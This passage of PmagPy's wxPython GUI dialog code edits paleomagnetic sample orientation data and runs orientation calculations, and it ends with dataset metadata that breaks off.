orientation_magic.py\n # the second is the name for display in the GUI\n self.header_display_names = [\"sample_name\", \"sample_orientation_flag\", \"mag_azimuth\",\n \"field_dip\", \"bedding_dip_direction\", \"bedding_dip\",\n \"shadow_angle\", \"latitude\", \"longitude\", \"mm/dd/yy\",\n \"hh:mm\", \"GPS_baseline\", \"GPS_Az\"]\n self.header_names = [\"sample_name\", \"sample_orientation_flag\", \"mag_azimuth\",\n \"field_dip\", \"bedding_dip_direction\", \"bedding_dip\",\n \"shadow_angle\", \"lat\", \"long\", \"date\",\n \"hhmm\", \"GPS_baseline\", \"GPS_Az\"]\n self.headers = list(zip(self.header_names, self.header_display_names))\n\n # get sample table and convert relevant headers to orient.txt format\n if (not self.orient_data) and ('samples' in self.contribution.tables):\n print(\"-I- Couldn't find demag_orient.txt, trying to extract information from samples table\")\n samp_container = self.contribution.tables['samples']\n # get lat/lon from sites if available\n if 'sites' in self.contribution.tables:\n site_contianer = self.contribution.tables['sites']\n self.contribution.propagate_cols(['lat', 'lon'], 'samples', 'sites')\n #\n raw_orient_data = samp_container.convert_to_pmag_data_list(\"dict\")\n # convert from 3.0. headers to orient.txt headers\n self.orient_data = {}\n orient_data = {}\n # must group to ensure that lat/lon/etc. 
are found no matter what\n df = samp_container.df\n res = df.T.apply(dict).groupby(df.index)\n for grouped in res:\n new_dict = {}\n ind_name = grouped[0]\n dictionaries = grouped[1]\n for dictionary in dictionaries:\n for key, value in dictionary.items():\n if key in new_dict:\n continue\n if (value and (value != 'None')) or (value == 0):\n new_dict[key] = value\n for key in dictionary.keys():\n if key not in new_dict:\n new_dict[key] = None\n orient_data[ind_name] = new_dict\n for key, rec in list(orient_data.items()):\n self.orient_data[key] = map_magic.mapping(rec, map_magic.magic3_2_orient_magic_map)\n # create grid\n self.create_sheet()\n\n TEXT = \"\"\"A template file named 'demag_orient.txt', for sample-level orientation data, was created in your MagIC working directory.\n\n You can view/modify demag_orient.txt here. To edit all the values in a column, click on the column header and then enter your desired value, or select an item from the drop-down menu.\n\n If you already have these data in MagIC format in Excel or Open Office, save the file as 'tab delimited' and then use the 'Import Orientation File' button below.\n\n After orientation data is filled in, you can Calculate sample orientations. Method codes will be added during this step. This will write orientation data to the site and sample tables.\n\"\"\"\n label_boxsizer = wx.StaticBoxSizer( wx.StaticBox( self.panel, wx.ID_ANY, 'input orientation data ' ), wx.VERTICAL )\n # width, height\n label = wx.StaticText(self.panel, label=TEXT, size=(600, 200))\n btn_box = wx.BoxSizer(wx.HORIZONTAL)\n save_btn = wx.Button(self.panel, wx.ID_ANY, \"Save Orientation File\")\n self.Bind(wx.EVT_BUTTON, self.on_m_save_file, save_btn)\n import_btn = wx.Button(self.panel, wx.ID_ANY, \"Import Orientation File\")\n self.Bind(wx.EVT_BUTTON, self.on_m_open_file, import_btn)\n calculate_btn = wx.Button(self.panel, wx.ID_ANY, \"Calculate Sample Orientations\")\n self.Bind(wx.EVT_BUTTON, self.on_m_calc_orient, calculate_btn)\n btn_box.Add(save_btn)\n btn_box.Add(import_btn, flag=wx.LEFT, border=5)\n btn_box.Add(calculate_btn, flag=wx.LEFT, border=5)\n\n self.vbox = wx.BoxSizer(wx.VERTICAL)\n #\n label_boxsizer.Add(label, flag=wx.CENTRE)\n self.vbox.Add(label_boxsizer, flag=wx.CENTRE|wx.ALL, border=15)\n #self.vbox.Add(label, flag=wx.CENTRE|wx.ALL, border=15)\n self.vbox.Add(btn_box, flag=wx.CENTRE)\n self.vbox.Add(self.grid, flag=wx.ALL, border=20)\n self.hbox_all = wx.BoxSizer(wx.HORIZONTAL)\n self.hbox_all.Add(self.vbox)\n if sys.platform in ['win32', 'win64']:\n self.panel.SetScrollbars(20, 20, 50, 50)\n self.panel.SetSizer(self.hbox_all)\n self.hbox_all.Fit(self)\n\n self.Bind(wx.EVT_CLOSE, self.OnCloseWindow)\n # save the template\n self.on_m_save_file(None)\n self.Centre()\n self.Show()\n\n\n\n def create_sheet(self):\n '''\n create an editable grid showing demag_orient.txt\n '''\n #--------------------------------\n # orient.txt supports many other headers\n # but we will only initialize with\n # the essential headers for\n # sample orientation and headers present\n # in existing demag_orient.txt file\n #--------------------------------\n\n\n #--------------------------------\n # create the grid\n #--------------------------------\n\n samples_list = list(self.orient_data.keys())\n samples_list.sort()\n self.samples_list = [ sample for sample in samples_list if sample != \"\" ]\n #self.headers.extend(self.add_extra_headers(samples_list))\n display_headers = [header[1] for header in self.headers]\n self.grid = 
magic_grid.MagicGrid(self.panel, 'orient grid',\n self.samples_list, display_headers)\n self.grid.InitUI()\n\n #--------------------------------\n # color the columns by groups\n #--------------------------------\n\n for i in range(len(self.samples_list)):\n self.grid.SetCellBackgroundColour(i, 0, \"LIGHT GREY\")\n self.grid.SetCellBackgroundColour(i, 1, \"LIGHT STEEL BLUE\")\n self.grid.SetCellBackgroundColour(i, 2, \"YELLOW\")\n self.grid.SetCellBackgroundColour(i, 3, \"YELLOW\")\n self.grid.SetCellBackgroundColour(i, 4, \"PALE GREEN\")\n self.grid.SetCellBackgroundColour(i, 5, \"PALE GREEN\")\n self.grid.SetCellBackgroundColour(i, 6, \"KHAKI\")\n self.grid.SetCellBackgroundColour(i, 7, \"KHAKI\")\n self.grid.SetCellBackgroundColour(i, 8, \"KHAKI\")\n self.grid.SetCellBackgroundColour(i, 9, \"KHAKI\")\n self.grid.SetCellBackgroundColour(i, 10, \"KHAKI\")\n self.grid.SetCellBackgroundColour(i, 11, \"LIGHT MAGENTA\")\n self.grid.SetCellBackgroundColour(i, 12, \"LIGHT MAGENTA\")\n\n\n #--------------------------------\n # fill data from self.orient_data\n #--------------------------------\n\n headers = [header[0] for header in self.headers]\n for sample in self.samples_list:\n for key in list(self.orient_data[sample].keys()):\n if key in headers:\n sample_index = self.samples_list.index(sample)\n i = headers.index(key)\n val = str(self.orient_data[sample][key])\n # if it's a pmag_object, use its name\n try:\n val = val.name\n except AttributeError:\n pass\n if val and val != \"None\":\n self.grid.SetCellValue(sample_index, i, val)\n\n #--------------------------------\n\n #--------------------------------\n # fill in some default values\n #--------------------------------\n for row in range(self.grid.GetNumberRows()):\n col = 1\n if not self.grid.GetCellValue(row, col):\n self.grid.SetCellValue(row, col, 'g')\n\n #--------------------------------\n\n # temporary trick to get drop-down-menus to work\n self.grid.changes = {'a'}\n\n self.grid.AutoSize()\n self.drop_down_menu = drop_down_menus3.Menus(\"orient\", self.contribution, self.grid)\n self.Bind(wx.grid.EVT_GRID_LABEL_LEFT_CLICK, self.onLeftClickLabel, self.grid)\n\n def update_sheet(self):\n self.grid.Destroy()\n self.create_sheet()\n self.vbox.Add(self.grid, flag=wx.ALL, border=20)\n #self.Hide()\n #self.Show()\n self.hbox_all.Fit(self.panel)\n #self.panel.Refresh()\n self.Hide()\n self.Show()\n\n def onLeftClickLabel(self, event):\n \"\"\"\n When user clicks on a grid label, determine if it is a row label or a col label.\n Pass along the event to the appropriate function.\n (It will either highlight a column for editing all values, or highlight a row for deletion).\n \"\"\"\n #if event.Col == -1 and event.Row == -1:\n # pass\n #elif event.Col < 0:\n # self.onSelectRow(event)\n if event.Row < 0:\n self.drop_down_menu.on_label_click(event)\n\n\n def on_m_open_file(self,event):\n '''\n open orient.txt\n read the data\n display the data from the file in a new grid\n '''\n dlg = wx.FileDialog(\n self, message=\"choose orient file\",\n defaultDir=self.WD,\n defaultFile=\"\",\n style=wx.FD_OPEN | wx.FD_CHANGE_DIR\n )\n if dlg.ShowModal() == wx.ID_OK:\n orient_file = dlg.GetPath()\n dlg.Destroy()\n new_data, dtype, keys = pmag.magic_read_dict(orient_file,\n sort_by_this_name=\"sample_name\",\n return_keys=True)\n\n if len(new_data) > 0:\n self.orient_data={}\n self.orient_data=new_data\n #self.create_sheet()\n self.update_sheet()\n print(\"-I- If you don't see a change in the spreadsheet, you may need to manually re-size the window\")\n\n 
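# (editorial note, hedged) on_m_save_file below writes demag_orient.txt\n # as a MagIC-style tab-delimited file: line one is the literal header\n # \"tab<TAB>demag_orient\", line two is the tab-joined column names, and\n # each following line is one tab-joined row per sample from the grid.\n 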
def on_m_save_file(self,event):\n\n '''\n save demag_orient.txt\n (only the columns that appear on the grid frame)\n '''\n fout = open(os.path.join(self.WD, \"demag_orient.txt\"), 'w')\n STR = \"tab\\tdemag_orient\\n\"\n fout.write(STR)\n headers = [header[0] for header in self.headers]\n STR = \"\\t\".join(headers) + \"\\n\"\n fout.write(STR)\n for sample in self.samples_list:\n STR = \"\"\n for header in headers:\n sample_index = self.samples_list.index(sample)\n i = headers.index(header)\n value = self.grid.GetCellValue(sample_index, i)\n STR = STR + value + \"\\t\"\n fout.write(STR[:-1] + \"\\n\")\n fout.close()\n if event != None:\n dlg1 = wx.MessageDialog(None,caption=\"Message:\", message=\"data saved in file demag_orient.txt\" ,style=wx.OK|wx.ICON_INFORMATION)\n dlg1.ShowModal()\n dlg1.Destroy()\n\n\n def on_m_calc_orient(self,event):\n '''\n This function does exactly what the 'import orientation' function does in MagIC.py\n after some dialog boxes the function calls orientation_magic.py\n '''\n # first save any edits to demag_orient.txt\n self.on_m_save_file(None)\n orient_convention_dia = orient_convention(None)\n orient_convention_dia.Center()\n #orient_convention_dia.ShowModal()\n if orient_convention_dia.ShowModal() == wx.ID_OK:\n ocn_flag = orient_convention_dia.ocn_flag\n dcn_flag = orient_convention_dia.dcn_flag\n gmt_flags = orient_convention_dia.gmt_flags\n orient_convention_dia.Destroy()\n else:\n return\n\n or_con = orient_convention_dia.ocn\n dec_correction_con = int(orient_convention_dia.dcn)\n try:\n hours_from_gmt = float(orient_convention_dia.gmt)\n except:\n hours_from_gmt = 0\n try:\n dec_correction = float(orient_convention_dia.correct_dec)\n except:\n dec_correction = 0\n\n method_code_dia=method_code_dialog(None)\n method_code_dia.Center()\n if method_code_dia.ShowModal() == wx.ID_OK:\n bedding_codes_flags=method_code_dia.bedding_codes_flags\n methodcodes_flags=method_code_dia.methodcodes_flags\n method_code_dia.Destroy()\n else:\n print(\"-I- Canceling calculation\")\n return\n\n method_codes = method_code_dia.methodcodes\n average_bedding = method_code_dia.average_bedding\n bed_correction = method_code_dia.bed_correction\n\n command_args=['orientation_magic.py']\n command_args.append(\"-WD %s\"%self.WD)\n command_args.append(\"-Fsa er_samples_orient.txt\")\n command_args.append(\"-Fsi er_sites_orient.txt \")\n command_args.append(\"-f %s\"%\"demag_orient.txt\")\n command_args.append(ocn_flag)\n command_args.append(dcn_flag)\n command_args.append(gmt_flags)\n command_args.append(bedding_codes_flags)\n command_args.append(methodcodes_flags)\n commandline = \" \".join(command_args)\n\n print(\"-I- executing command: %s\" %commandline)\n os.chdir(self.WD)\n if os.path.exists(os.path.join(self.WD, 'er_samples.txt')) or os.path.exists(os.path.join(self.WD, 'er_sites.txt')):\n append = True\n elif os.path.exists(os.path.join(self.WD, 'samples.txt')) or os.path.exists(os.path.join(self.WD, 'sites.txt')):\n append = True\n else:\n append = False\n samp_file = \"er_samples.txt\"\n site_file = \"er_sites.txt\"\n success, error_message = ipmag.orientation_magic(or_con, dec_correction_con, dec_correction,\n bed_correction, hours_from_gmt=hours_from_gmt,\n method_codes=method_codes, average_bedding=average_bedding,\n orient_file='demag_orient.txt', samp_file=samp_file,\n site_file=site_file, input_dir_path=self.WD,\n output_dir_path=self.WD, append=append, data_model=3)\n\n if not success:\n dlg1 = wx.MessageDialog(None,caption=\"Message:\", message=\"-E- ERROR: Error in running 
orientation_magic\\n{}\".format(error_message) ,style=wx.OK|wx.ICON_INFORMATION)\n dlg1.ShowModal()\n dlg1.Destroy()\n\n print(\"-E- ERROR: Error in running orientation_magic\")\n return\n else:\n dlg2 = wx.MessageDialog(None,caption=\"Message:\", message=\"-I- Successfully ran orientation_magic\", style=wx.OK|wx.ICON_INFORMATION)\n dlg2.ShowModal()\n dlg2.Destroy()\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n self.contribution.add_magic_table('samples')\n return\n\n\n def OnCloseWindow(self,event):\n dlg1 = wx.MessageDialog(self,caption=\"Message:\", message=\"Save changes to demag_orient.txt?\\n \" ,style=wx.OK|wx.CANCEL)\n result = dlg1.ShowModal()\n if result == wx.ID_OK:\n self.on_m_save_file(None)\n dlg1.Destroy()\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n if result == wx.ID_CANCEL:\n dlg1.Destroy()\n self.Parent.Show()\n self.Parent.Raise()\n self.Destroy()\n\n\nclass orient_convention(wx.Dialog):\n\n def __init__(self, *args, **kw):\n super(orient_convention, self).__init__(*args, **kw)\n\n self.InitUI()\n #self.SetSize((250, 200))\n self.SetTitle(\"set orientation convention\")\n\n def InitUI(self):\n\n pnl = wx.Panel(self)\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n #-----------------------\n # orientation convention\n #-----------------------\n\n sbs = wx.StaticBoxSizer( wx.StaticBox( pnl, wx.ID_ANY, 'orientation convention' ), wx.VERTICAL )\n\n sbs.AddSpacer(5)\n self.oc_rb1 = wx.RadioButton(pnl, -1,label='Pomeroy: Lab arrow azimuth = mag_azimuth; Lab arrow dip=-field_dip (field_dip is hade)',name='1', style=wx.RB_GROUP)\n sbs.Add(self.oc_rb1)\n sbs.AddSpacer(5)\n self.oc_rb2 = wx.RadioButton(pnl, -1, label='Lab arrow azimuth = mag_azimuth-90 (mag_azimuth is strike); Lab arrow dip = -field_dip', name='2')\n sbs.Add(self.oc_rb2)\n sbs.AddSpacer(5)\n self.oc_rb3 = wx.RadioButton(pnl, -1, label='Lab arrow azimuth = mag_azimuth; Lab arrow dip = 90-field_dip (field_dip is inclination of lab arrow)', name='3')\n sbs.Add(self.oc_rb3)\n sbs.AddSpacer(5)\n self.oc_rb4 = wx.RadioButton(pnl, -1, label='Lab arrow azimuth and dip are same as mag_azimuth, field_dip', name='4')\n sbs.Add(self.oc_rb4)\n sbs.AddSpacer(5)\n self.oc_rb5 = wx.RadioButton(pnl, -1, label='ASC: Lab arrow azimuth and dip are mag_azimuth, field_dip-90 (field arrow is inclination of specimen Z direction)',name='5')\n sbs.Add(self.oc_rb5)\n sbs.AddSpacer(5)\n self.oc_rb6 = wx.RadioButton(pnl, -1, label='Lab arrow azimuth = mag_azimuth-90 (mag_azimuth is strike); Lab arrow dip = 90-field_dip', name='6')\n sbs.Add(self.oc_rb6)\n sbs.AddSpacer(5)\n\n #-----------------------\n # declination correction\n #-----------------------\n sbs2 = wx.StaticBoxSizer( wx.StaticBox( pnl, wx.ID_ANY, 'declination correction' ), wx.VERTICAL )\n hbox_dc1 = wx.BoxSizer(wx.HORIZONTAL)\n\n sbs2.AddSpacer(5)\n self.dc_rb1 = wx.RadioButton(pnl, -1, 'Use the IGRF DEC value at the lat/long and date supplied', (10, 50), style=wx.RB_GROUP)\n self.dc_rb2 = wx.RadioButton(pnl, -1, 'Use this DEC:', (10, 50))\n self.dc_tb2 = wx.TextCtrl(pnl,style=wx.CENTER)\n self.dc_rb3 = wx.RadioButton(pnl, -1, 'DEC=0, mag_az is already corrected in file', (10, 50))\n\n sbs2.Add(self.dc_rb1)\n sbs2.AddSpacer(5)\n hbox_dc1.Add(self.dc_rb2)\n hbox_dc1.AddSpacer(5)\n hbox_dc1.Add(self.dc_tb2)\n sbs2.Add(hbox_dc1)\n\n sbs2.AddSpacer(5)\n sbs2.Add(self.dc_rb3)\n sbs2.AddSpacer(5)\n\n\n #-----------------------\n # orientation priority\n #-----------------------\n sbs3 = wx.StaticBoxSizer( wx.StaticBox( pnl, wx.ID_ANY, 'orientation priority' ), 
wx.VERTICAL )\n\n sbs3.AddSpacer(5)\n self.op_rb1 = wx.RadioButton(pnl, -1, label='1) sun compass 2) differential GPS 3) magnetic compass',\n name='1', style=wx.RB_GROUP)\n sbs3.Add(self.op_rb1)\n sbs3.AddSpacer(5)\n self.op_rb2 = wx.RadioButton(pnl, -1, label='1) differential GPS 2) magnetic compass 3) sun compass ',\n name='2')\n sbs3.Add(self.op_rb2)\n sbs3.AddSpacer(5)\n\n\n #-----------------------\n # add local time for GMT\n #-----------------------\n\n sbs4 = wx.StaticBoxSizer( wx.StaticBox( pnl, wx.ID_ANY, 'add local time' ), wx.HORIZONTAL )\n #hbox_alt = wx.BoxSizer(wx.HORIZONTAL)\n\n sbs4.AddSpacer(5)\n self.dc_alt = wx.TextCtrl(pnl,style=wx.CENTER)\n alt_txt = wx.StaticText(pnl, label=\"Hours to ADD to local time for GMT, default is 0\",\n style=wx.TE_CENTER)\n sbs4.Add(alt_txt)\n sbs4.AddSpacer(5)\n sbs4.Add(self.dc_alt)\n\n #-----------------------\n # OK button\n #-----------------------\n\n hbox2 = wx.BoxSizer(wx.HORIZONTAL)\n self.okButton = wx.Button(pnl, wx.ID_OK, \"&OK\")\n self.Bind(wx.EVT_BUTTON, self.OnOK, self.okButton)\n hbox2.Add(self.okButton)\n self.cancelButton = wx.Button(pnl, wx.ID_CANCEL, \"&Cancel\")\n self.Bind(wx.EVT_BUTTON, self.OnCancel, self.cancelButton)\n hbox2.Add(self.cancelButton)\n\n\n #-----------------------\n # design the frame\n #-----------------------\n\n vbox.AddSpacer(10)\n vbox.Add(sbs)\n vbox.AddSpacer(10)\n vbox.Add(sbs2)\n vbox.AddSpacer(10)\n vbox.Add(sbs3)\n vbox.AddSpacer(10)\n vbox.Add(sbs4)\n vbox.AddSpacer(10)\n vbox.Add(hbox2)\n vbox.AddSpacer(10)\n\n hbox1=wx.BoxSizer(wx.HORIZONTAL)\n hbox1.AddSpacer(10)\n hbox1.Add(vbox)\n hbox1.AddSpacer(10)\n\n pnl.SetSizer(hbox1)\n hbox1.Fit(self)\n\n #-----------------------\n # initialize default values\n #-----------------------\n\n self.oc_rb4.SetValue(True)\n self.dc_rb1.SetValue(True)\n self.op_rb1.SetValue(True)\n\n def OnCancel(self, e):\n self.EndModal(wx.ID_CANCEL)\n\n def OnOK(self, e):\n self.ocn = \"\"\n if self.oc_rb1.GetValue() == True:\n self.ocn = \"1\"\n if self.oc_rb2.GetValue() == True:\n self.ocn=\"2\"\n if self.oc_rb3.GetValue() == True:\n self.ocn=\"3\"\n if self.oc_rb4.GetValue() == True:\n self.ocn = \"4\"\n if self.oc_rb5.GetValue() == True:\n self.ocn=\"5\"\n if self.oc_rb6.GetValue() == True:\n self.ocn=\"6\"\n\n self.dcn = \"\"\n self.correct_dec = \"\"\n if self.dc_rb1.GetValue() == True:\n self.dcn = \"1\"\n if self.dc_rb2.GetValue() == True:\n self.dcn=\"2\"\n try:\n self.correct_dec = float(self.dc_tb2.GetValue())\n except:\n dlg1 = wx.MessageDialog(None, caption=\"Error:\", message=\"Add declination\", style=wx.OK|wx.ICON_INFORMATION)\n dlg1.ShowModal()\n dlg1.Destroy()\n\n if self.dc_rb3.GetValue()==True:\n self.dcn = \"3\"\n\n if self.op_rb1.GetValue() == True:\n self.op = \"1\"\n if self.op_rb2.GetValue() == True:\n self.op = \"2\"\n\n if self.dc_alt.GetValue() != \"\":\n try:\n self.gmt = float(self.dc_alt.GetValue())\n gmt_flags = \"-gmt \" + self.dc_alt.GetValue()\n except:\n gmt_flags=\"\"\n else:\n self.gmt = \"\"\n gmt_flags = \"\"\n #-------------\n self.ocn_flag = \"-ocn \"+ self.ocn\n self.dcn_flag = \"-dcn \"+ self.dcn\n self.gmt_flags = gmt_flags\n self.EndModal(wx.ID_OK)\n #self.Close()\n\n\nclass method_code_dialog(wx.Dialog):\n\n def __init__(self, *args, **kw):\n super(method_code_dialog, self).__init__(*args, **kw)\n\n self.InitUI()\n self.SetTitle(\"additional required information\")\n\n def InitUI(self):\n\n pnl = wx.Panel(self)\n vbox=wx.BoxSizer(wx.VERTICAL)\n\n #-----------------------\n # MagIC codes\n #-----------------------\n\n 
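# (editorial note, hedged) Each checkbox below maps to a MagIC\n # controlled-vocabulary method code (FS-* for field sampling, SO-* for\n # sample orientation); OnOK joins the checked codes with ':' to build\n # the -mcd flag passed on to orientation_magic.\n 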
sbs1 = wx.StaticBoxSizer( wx.StaticBox( pnl, wx.ID_ANY, 'MagIC codes' ), wx.VERTICAL )\n self.cb1 = wx.CheckBox(pnl, -1, 'FS-FD: field sampling done with a drill')\n self.cb2 = wx.CheckBox(pnl, -1, 'FS-H: field sampling done with hand sample')\n self.cb3 = wx.CheckBox(pnl, -1, 'FS-LOC-GPS: field location done with GPS')\n self.cb4 = wx.CheckBox(pnl, -1, 'FS-LOC-MAP: field location done with map')\n self.cb5 = wx.CheckBox(pnl, -1, 'SO-POM: a Pomeroy orientation device was used')\n self.cb6 = wx.CheckBox(pnl, -1, 'SO-ASC: an ASC orientation device was used')\n self.cb7 = wx.CheckBox(pnl, -1, 'SO-MAG: magnetic compass used for all orientations')\n self.cb8 = wx.CheckBox(pnl, -1, 'SO-SUN: sun compass used for all orientations')\n self.cb9 = wx.CheckBox(pnl, -1, 'SO-SM: either magnetic or sun used on all orientations ')\n self.cb10 = wx.CheckBox(pnl, -1, 'SO-SIGHT: orientation from sighting')\n\n for cb in [self.cb1, self.cb2, self.cb3, self.cb4, self.cb5,\n self.cb6, self.cb7, self.cb8, self.cb9, self.cb10]:\n sbs1.Add(cb, flag=wx.BOTTOM, border=5)\n\n #-----------------------\n # Bedding convention\n #-----------------------\n\n sbs2 = wx.StaticBoxSizer(wx.StaticBox(pnl, wx.ID_ANY, 'bedding convention'), wx.VERTICAL)\n self.bed_con1 = wx.CheckBox(pnl, -1, 'Take fisher mean of bedding poles?')\n self.bed_con2 = wx.CheckBox(pnl, -1, \"Don't correct bedding dip direction with declination - already correct\")\n\n sbs2.Add(self.bed_con1, flag=wx.BOTTOM, border=5)\n sbs2.Add(self.bed_con2, flag=wx.BOTTOM, border=5)\n\n #-----------------------\n # OK button\n #-----------------------\n\n hbox2 = wx.BoxSizer(wx.HORIZONTAL)\n self.okButton = wx.Button(pnl, wx.ID_OK, \"&OK\")\n self.Bind(wx.EVT_BUTTON, self.OnOK, self.okButton)\n hbox2.Add(self.okButton)\n self.cancelButton = wx.Button(pnl, wx.ID_CANCEL, \"&Cancel\")\n self.Bind(wx.EVT_BUTTON, self.OnCancel, self.cancelButton)\n hbox2.Add(self.cancelButton)\n\n #-----------------------\n # design the frame\n #-----------------------\n vbox.Add(sbs1)\n vbox.AddSpacer(5)\n vbox.Add(sbs2)\n vbox.AddSpacer(5)\n vbox.Add(hbox2)\n vbox.AddSpacer(10)\n\n hbox1=wx.BoxSizer(wx.HORIZONTAL)\n hbox1.AddSpacer(10)\n hbox1.Add(vbox)\n hbox1.AddSpacer(10)\n\n pnl.SetSizer(hbox1)\n hbox1.Fit(self)\n\n def OnCancel(self, e):\n self.EndModal(wx.ID_CANCEL)\n\n def OnOK(self, e):\n methodcodes=[]\n if self.cb1.GetValue() == True:\n methodcodes.append('FS-FD')\n if self.cb2.GetValue() == True:\n methodcodes.append('FS-H')\n if self.cb3.GetValue() == True:\n methodcodes.append('FS-LOC-GPS')\n if self.cb4.GetValue() == True:\n methodcodes.append('FS-LOC-MAP')\n if self.cb5.GetValue() == True:\n methodcodes.append('SO-POM')\n if self.cb6.GetValue() == True:\n methodcodes.append('SO-ASC')\n if self.cb7.GetValue() == True:\n methodcodes.append('SO-MAG')\n if self.cb8.GetValue() == True:\n methodcodes.append('SO-SUN')\n if self.cb9.GetValue() == True:\n methodcodes.append('SO-SM')\n if self.cb10.GetValue() == True:\n methodcodes.append('SO-SIGHT')\n\n if methodcodes == []:\n self.methodcodes_flags=\"\"\n self.methodcodes = \"\"\n else:\n self.methodcodes_flags = \"-mcd \" + \":\".join(methodcodes)\n self.methodcodes = \":\".join(methodcodes)\n\n bedding_codes=[]\n\n if self.bed_con1.GetValue() == True:\n bedding_codes.append(\"-a\")\n self.average_bedding = True\n else:\n self.average_bedding = False\n if self.bed_con2.GetValue() ==True:\n bedding_codes.append(\"-BCN\")\n self.bed_correction = False\n else:\n self.bed_correction = True\n self.bedding_codes_flags = \" 
\".join(bedding_codes)\n self.EndModal(wx.ID_OK)\n #self.Close()ls *.html\n", "sub_path": "dialogs/pmag_gui_dialogs.py", "file_name": "pmag_gui_dialogs.py", "file_ext": "py", "file_size_in_byte": 141142, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "14", "api": [{"api_name": "wx.Dialog", "line_number": 26, "usage_type": "attribute"}, {"api_name": "wx.Dialog.__init__", "line_number": 28, "usage_type": "call"}, {"api_name": "wx.Dialog", "line_number": 28, "usage_type": "attribute"}, {"api_name": "wx.Panel", "line_number": 36, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 37, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 37, "usage_type": "attribute"}, {"api_name": "wx.StaticBoxSizer", "line_number": 42, "usage_type": "call"}, {"api_name": "wx.StaticBox", "line_number": 42, "usage_type": "call"}, {"api_name": "wx.ID_ANY", "line_number": 42, "usage_type": "attribute"}, {"api_name": "wx.VERTICAL", "line_number": 42, "usage_type": "attribute"}, {"api_name": "wx.RadioButton", "line_number": 47, "usage_type": "call"}, {"api_name": "wx.BOTTOM", "line_number": 49, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 51, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 51, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 51, "usage_type": "attribute"}, {"api_name": "wx.EVT_RADIOBUTTON", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 62, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 62, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 63, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 65, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 66, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 66, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 67, "usage_type": "attribute"}, {"api_name": "wx.EVT_CLOSE", "line_number": 68, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 70, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 72, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 73, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 89, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 89, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 108, "usage_type": "call"}, {"api_name": "programs.conversion_scripts.tdt_magic.convert", "line_number": 131, "usage_type": "call"}, {"api_name": "programs.conversion_scripts.tdt_magic", "line_number": 131, "usage_type": "name"}, {"api_name": "wx.Frame", "line_number": 155, "usage_type": "attribute"}, {"api_name": "wx.Frame.__init__", "line_number": 160, "usage_type": "call"}, {"api_name": "wx.Frame", "line_number": 160, "usage_type": "attribute"}, {"api_name": "wx.ID_ANY", "line_number": 160, "usage_type": "attribute"}, {"api_name": "wx.ScrolledWindow", "line_number": 161, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 173, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 173, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 174, "usage_type": "call"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 174, "usage_type": "attribute"}, {"api_name": "dialogs.pmag_widgets.combine_files", "line_number": 178, "usage_type": "call"}, {"api_name": "dialogs.pmag_widgets", "line_number": 178, "usage_type": 
"name"}, {"api_name": "wx.Button", "line_number": 181, "usage_type": "call"}, {"api_name": "wx.ID_OK", "line_number": 181, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 182, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 184, "usage_type": "call"}, {"api_name": "wx.ID_CANCEL", "line_number": 184, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 185, "usage_type": "attribute"}, {"api_name": "wx.EVT_CLOSE", "line_number": 186, "usage_type": "attribute"}, {"api_name": "wx.Button", "line_number": 188, "usage_type": "call"}, {"api_name": "wx.EVT_BUTTON", "line_number": 189, "usage_type": "attribute"}, {"api_name": "wx.EVT_MENU", "line_number": 191, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 193, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 193, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 195, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 196, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 199, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 199, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 201, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_LEFT", "line_number": 203, "usage_type": "attribute"}, {"api_name": "wx.StaticLine", "line_number": 206, "usage_type": "call"}, {"api_name": "wx.ALL", "line_number": 206, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 206, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 207, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 210, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 210, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 235, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 240, "usage_type": "call"}, {"api_name": "os.path", "line_number": 240, "usage_type": "attribute"}, {"api_name": "pmagpy.ipmag.combine_magic", "line_number": 243, "usage_type": "call"}, {"api_name": "pmagpy.ipmag", "line_number": 243, "usage_type": "name"}, {"api_name": "wx.MessageDialog", "line_number": 245, "usage_type": "call"}, {"api_name": "wx.OK", "line_number": 245, "usage_type": "attribute"}, {"api_name": 